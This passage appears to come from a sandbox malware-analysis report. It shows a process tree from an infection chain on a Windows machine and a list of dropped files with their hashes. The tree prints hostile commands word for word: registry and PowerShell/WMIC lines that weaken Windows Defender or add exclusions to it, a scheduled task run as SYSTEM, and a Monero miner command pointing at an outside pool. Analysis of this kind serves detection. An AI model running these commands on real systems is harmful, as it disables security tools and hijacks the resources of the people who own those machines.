                                                  "C:\Users\Admin\Pictures\OWtTjfExSmXp5VLaoyC8KEr4.exe"
                                                  7⤵
                                                    PID:3960
                                                • C:\Users\Admin\Pictures\h993nPW0RxpAsQGPnVrI0kzh.exe
                                                  "C:\Users\Admin\Pictures\h993nPW0RxpAsQGPnVrI0kzh.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:4220
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -nologo -noprofile
                                                    7⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    PID:2376
                                                  • C:\Users\Admin\Pictures\h993nPW0RxpAsQGPnVrI0kzh.exe
                                                    "C:\Users\Admin\Pictures\h993nPW0RxpAsQGPnVrI0kzh.exe"
                                                    7⤵
                                                      PID:5104
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 784
                                                      7⤵
                                                      • Program crash
                                                      PID:1040
                                                  • C:\Users\Admin\Pictures\FHnccWSd1I2oKYpJEOSgWugZ.exe
                                                    "C:\Users\Admin\Pictures\FHnccWSd1I2oKYpJEOSgWugZ.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:2316
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -nologo -noprofile
                                                      7⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      PID:2260
                                                  • C:\Users\Admin\Pictures\oWQqvINPfQbKh9k40OvGgfNr.exe
                                                    "C:\Users\Admin\Pictures\oWQqvINPfQbKh9k40OvGgfNr.exe" /s
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:3940
                                                  • C:\Users\Admin\Pictures\Du1OzW7LxyEIy7MUTkLxGcI5.exe
                                                    "C:\Users\Admin\Pictures\Du1OzW7LxyEIy7MUTkLxGcI5.exe"
                                                    6⤵
                                                      PID:4592
                                                    • C:\Users\Admin\Pictures\QZMrgFqPW3PrOeePcLCvRHyg.exe
                                                      "C:\Users\Admin\Pictures\QZMrgFqPW3PrOeePcLCvRHyg.exe"
                                                      6⤵
                                                        PID:3504
                                                        • C:\Users\Admin\AppData\Local\Temp\7zSCC73.tmp\Install.exe
                                                          .\Install.exe /tEdidDDf "385118" /S
                                                          7⤵
                                                            PID:3344
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                              8⤵
                                                                PID:4880
                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                  9⤵
                                                                    PID:1972
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                      10⤵
                                                                        PID:700
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                          11⤵
                                                                            PID:4480
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                        9⤵
                                                                          PID:1576
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                            10⤵
                                                                              PID:2092
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                11⤵
                                                                                  PID:3280
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                              9⤵
                                                                                PID:4844
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                  10⤵
                                                                                    PID:2372
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                      11⤵
                                                                                        PID:4840
                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                  8⤵
                                                                                    PID:4764
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                      9⤵
                                                                                        PID:2532
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                          10⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:3160
                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                            11⤵
                                                                                              PID:4652
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 19:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCC73.tmp\Install.exe\" it /qaydidPqhD 385118 /S" /V1 /F
                                                                                        8⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4180
                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                                                                                        8⤵
                                                                                          PID:3552
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                            9⤵
                                                                                              PID:5224
                                                                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                                                                schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                                                                                                10⤵
                                                                                                  PID:5272
                                                                                        • C:\Users\Admin\Pictures\GggARtr9uRsYFTkbJRE1dw1S.exe
                                                                                          "C:\Users\Admin\Pictures\GggARtr9uRsYFTkbJRE1dw1S.exe"
                                                                                          6⤵
                                                                                            PID:3632
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2468 -ip 2468
                                                                                  1⤵
                                                                                    PID:4116
                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:1456
                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                      "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4696
                                                                                      • C:\Windows\Temp\52388.exe
                                                                                        "C:\Windows\Temp\52388.exe" --list-devices
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:1752
                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2408
                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                      "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3964
                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                    "C:\Program Files (x86)\GameSyncLink\GameService.exe"
                                                                                    1⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1092
                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                      "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3144
                                                                                      • C:\Windows\Temp\679483.exe
                                                                                        "C:\Windows\Temp\679483.exe" --http-port 14343 -o xmr.2miners.com:2222 -u 83dQM82bj4yY83XKGKHnbHTzqgY4FUt2pi1JS15u7rTs8v84mTU5ny5MiRoSeyduBUAQKFZ6MsvbMHYTisNeThDM3BqQ59y --coin XMR -t 1 --no-color -p x
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:1776
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Executes dropped EXE
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:1588
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4332 -ip 4332
                                                                                    1⤵
                                                                                      PID:3012
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4964 -ip 4964
                                                                                      1⤵
                                                                                        PID:1588
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4332 -ip 4332
                                                                                        1⤵
                                                                                          PID:5040
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4332 -ip 4332
                                                                                          1⤵
                                                                                            PID:2516
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4332 -ip 4332
                                                                                            1⤵
                                                                                              PID:1008
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4332 -ip 4332
                                                                                              1⤵
                                                                                                PID:1084
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4332 -ip 4332
                                                                                                1⤵
                                                                                                  PID:4632
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4332 -ip 4332
                                                                                                  1⤵
                                                                                                    PID:3104
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4332 -ip 4332
                                                                                                    1⤵
                                                                                                      PID:4084
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4332 -ip 4332
                                                                                                      1⤵
                                                                                                        PID:1704
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                        1⤵
                                                                                                          PID:1720
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                          1⤵
                                                                                                            PID:376
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4268 -ip 4268
                                                                                                            1⤵
                                                                                                              PID:3208
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4268 -ip 4268
                                                                                                              1⤵
                                                                                                                PID:1364
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4268 -ip 4268
                                                                                                                1⤵
                                                                                                                  PID:1564
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4268 -ip 4268
                                                                                                                  1⤵
                                                                                                                    PID:1704
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4268 -ip 4268
                                                                                                                    1⤵
                                                                                                                      PID:4912
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4268 -ip 4268
                                                                                                                      1⤵
                                                                                                                        PID:1432
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 888 -ip 888
                                                                                                                        1⤵
                                                                                                                          PID:2524
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4220 -ip 4220
                                                                                                                          1⤵
                                                                                                                            PID:976
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1084 -ip 1084
                                                                                                                            1⤵
                                                                                                                              PID:4164
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4268 -ip 4268
                                                                                                                              1⤵
                                                                                                                                PID:3580
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4268 -ip 4268
                                                                                                                                1⤵
                                                                                                                                  PID:4440
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:2944
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:3040
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4268 -ip 4268
                                                                                                                                      1⤵
                                                                                                                                        PID:3348
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCC73.tmp\Install.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7zSCC73.tmp\Install.exe it /qaydidPqhD 385118 /S
                                                                                                                                        1⤵
                                                                                                                                          PID:5308
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                            2⤵
                                                                                                                                              PID:5508
                                                                                                                                          • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                            C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5536
                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                2⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:5568

                                                                                                                                            Network

                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                            Replay Monitor

                                                                                                                                            Loading Replay Monitor...

                                                                                                                                            Downloads

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                              Filesize

                                                                                                                                              288KB

                                                                                                                                              MD5

                                                                                                                                              d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                              SHA1

                                                                                                                                              e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                              SHA256

                                                                                                                                              472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                              SHA512

                                                                                                                                              1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                              Filesize

                                                                                                                                              2.5MB

                                                                                                                                              MD5

                                                                                                                                              e6943a08bb91fc3086394c7314be367d

                                                                                                                                              SHA1

                                                                                                                                              451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                              SHA256

                                                                                                                                              aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                              SHA512

                                                                                                                                              505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                              Filesize

                                                                                                                                              6.2MB

                                                                                                                                              MD5

                                                                                                                                              1bacbebf6b237c75dbe5610d2d9e1812

                                                                                                                                              SHA1

                                                                                                                                              3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                                                                              SHA256

                                                                                                                                              c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                                                                              SHA512

                                                                                                                                              f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                              Filesize

                                                                                                                                              13.2MB

                                                                                                                                              MD5

                                                                                                                                              72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                              SHA1

                                                                                                                                              5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                              SHA256

                                                                                                                                              d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                              SHA512

                                                                                                                                              ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                              Filesize

                                                                                                                                              301B

                                                                                                                                              MD5

                                                                                                                                              998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                              SHA1

                                                                                                                                              a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                              SHA256

                                                                                                                                              a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                              SHA512

                                                                                                                                              7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                              Filesize

                                                                                                                                              284B

                                                                                                                                              MD5

                                                                                                                                              5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                              SHA1

                                                                                                                                              82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                              SHA256

                                                                                                                                              98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                              SHA512

                                                                                                                                              9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                            • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                                                              Filesize

                                                                                                                                              218B

                                                                                                                                              MD5

                                                                                                                                              94b87b86dc338b8f0c4e5869496a8a35

                                                                                                                                              SHA1

                                                                                                                                              2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                                                              SHA256

                                                                                                                                              2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                                                              SHA512

                                                                                                                                              b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                              Filesize

                                                                                                                                              654B

                                                                                                                                              MD5

                                                                                                                                              5cdfc4b9de66db60219b702987b6884f

                                                                                                                                              SHA1

                                                                                                                                              3f664159cd6af48abc3f4c4a2d0ec16ff715b208

                                                                                                                                              SHA256

                                                                                                                                              9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

                                                                                                                                              SHA512

                                                                                                                                              3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                              Filesize

                                                                                                                                              830B

                                                                                                                                              MD5

                                                                                                                                              a483da8b27289fc9cc49d6b17e61cbf6

                                                                                                                                              SHA1

                                                                                                                                              2d4a5a704c2ff332df6436b7bcd16365f03c2a97

                                                                                                                                              SHA256

                                                                                                                                              f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

                                                                                                                                              SHA512

                                                                                                                                              e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                              Filesize

                                                                                                                                              2.7MB

                                                                                                                                              MD5

                                                                                                                                              31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                              SHA1

                                                                                                                                              ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                              SHA256

                                                                                                                                              222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                              SHA512

                                                                                                                                              53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                                                                                                                                              Filesize

                                                                                                                                              402KB

                                                                                                                                              MD5

                                                                                                                                              7f981db325bfed412599b12604bd00ab

                                                                                                                                              SHA1

                                                                                                                                              9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                                                                              SHA256

                                                                                                                                              043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                                                                              SHA512

                                                                                                                                              a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                              Filesize

                                                                                                                                              304KB

                                                                                                                                              MD5

                                                                                                                                              9faf597de46ed64912a01491fe550d33

                                                                                                                                              SHA1

                                                                                                                                              49203277926355afd49393782ae4e01802ad48af

                                                                                                                                              SHA256

                                                                                                                                              0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                              SHA512

                                                                                                                                              ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                              Filesize

                                                                                                                                              4.2MB

                                                                                                                                              MD5

                                                                                                                                              0f52e5e68fe33694d488bfe7a1a71529

                                                                                                                                              SHA1

                                                                                                                                              11d7005bd72cb3fd46f24917bf3fc5f3203f361f

                                                                                                                                              SHA256

                                                                                                                                              efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

                                                                                                                                              SHA512

                                                                                                                                              238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                                                                                                                              Filesize

                                                                                                                                              1.0MB

                                                                                                                                              MD5

                                                                                                                                              808c0214e53b576530ee5b4592793bb0

                                                                                                                                              SHA1

                                                                                                                                              3fb03784f5dab1e99d5453664bd3169eff495c97

                                                                                                                                              SHA256

                                                                                                                                              434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

                                                                                                                                              SHA512

                                                                                                                                              2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                                                                                                              Filesize

                                                                                                                                              1.2MB

                                                                                                                                              MD5

                                                                                                                                              56e7d98642cfc9ec438b59022c2d58d7

                                                                                                                                              SHA1

                                                                                                                                              26526f702e584d8c8b629b2db5d282c2125665d7

                                                                                                                                              SHA256

                                                                                                                                              a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                                                                                                                                              SHA512

                                                                                                                                              0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                              Filesize

                                                                                                                                              418KB

                                                                                                                                              MD5

                                                                                                                                              0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                              SHA1

                                                                                                                                              0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                              SHA256

                                                                                                                                              919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                              SHA512

                                                                                                                                              5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

